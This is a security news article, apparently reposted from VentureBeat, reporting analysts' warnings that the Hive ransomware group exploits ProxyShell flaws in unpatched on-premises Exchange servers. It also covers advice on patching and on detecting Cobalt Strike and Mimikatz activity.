Experts warn Hive ransomware gang can detect unpatched servers with web crawler

Since June 2021, the Hive threat group has targeted organizations in the financial, energy and healthcare sectors as part of coordinated ransomware attacks.

During the attacks, the group uses ProxyShell vulnerabilities in MSFT Exchange servers to remotely execute arbitrary commands and encrypt corporate data with its unique hive ransomware strain.

The group is highly organized, with Varonis’ research team recently discovering that a threat actor managed to penetrate an organization’s environment and encrypt the target data containing the ransomware strain in less than 72 hours.

These attacks are of particular concern because unpatched exchange servers can be publicly discovered through web crawlers. “Anyone with an unpatched exchange server is at risk,” said Gartner analyst Peter Firstbrook.

“Even organizations that have migrated to the cloud version of Exchange often still have some on-premises Exchange servers that can be exploited if they are not patched. Threats are already circulating and unpatched servers can be detected with a web crawler, so it is very likely that unpatched servers will be exploited,” Firstbrook said.

How much risk does ProxyShell entail?

Despite the importance of these vulnerabilities, many organizations have failed to patch their on-premises Exchange servers (these vulnerabilities do not affect Exchange online or Office 365 servers).

Last year, Mandiant reported that about 30,000 Exchange Servers remain unpatched, and recent attacks show that many organizations are slow to update their systems.

This is problematic as the vulnerabilities could allow an attacker to remotely execute arbitrary commands and malicious code on the Microsoft Exchange server over the 443 port.

“Attackers continue to exploit the ProxyShell vulnerabilities that were initially revealed more than eight months ago. They have proven to be a reliable source for attackers since their disclosure, despite patches being available,” said Claire Tills, Senior Research Engineer at Tenable.

“The latest attacks by an affiliate of the Hive ransomware group are made possible by the ubiquity of Microsoft Exchange and apparent delays in patching these months-old vulnerabilities. Organizations around the world in diverse industries use Microsoft Exchange for critical business functions, making it an ideal target for threat actors.”

Tills suggests that organizations that fail to patch their Exchange servers allow attackers to reduce the amount of reconnaissance and immediate steps they need to take to infiltrate target systems.

Detect ProxyShell Intrusions

Organizations that are slow to patch, such as less mature IT organizations or IT organizations that are understaffed, may fall into the trap of thinking just because there are no obvious signs of intrusion that no one has used ProxyShell to gain a foothold. to get in the area, but this isn’t always the case.

Firstbrook notes that while “ransomware attacks will be obvious to organizations when they happen, there are a host of other attack techniques that [be] a lot of stealthier, so the absence of ransomware doesn’t mean the Exchange server isn’t already compromised.”

It is for this reason that Brian Donohue, Principal Information Security Specialist at Managed Detection and Response (MDR) provider Red Canary, recommends that organizations ensure that they can detect the Cobalt Strike or Mimikatz execution even if they cannot update Exchange. †

“Broad defense and deep defense against a wide variety of threats means that even if you can’t patch your Exchange servers or the adversary uses completely new trading techniques in certain parts of the attack, you can still catch Mimikatz activity, or you would have a warning looking for the heavily obfuscated PowerShell used by Cobalt Strike — all of that happening before anything gets encrypted,” Donohue said.

In other words, companies that haven’t patched the vulnerabilities can still protect themselves by using Managed Detection and Response and other security solutions to detect malicious activity preceding ransomware encryption so they can respond before it’s too late.

VentureBeat’s mission is to be a digital city square for tech decision makers to learn about transformative business technology and transactions. Learn more about membership.

This post Experts warn Hive ransomware gang can detect unpatched servers with web crawler

was original published at “”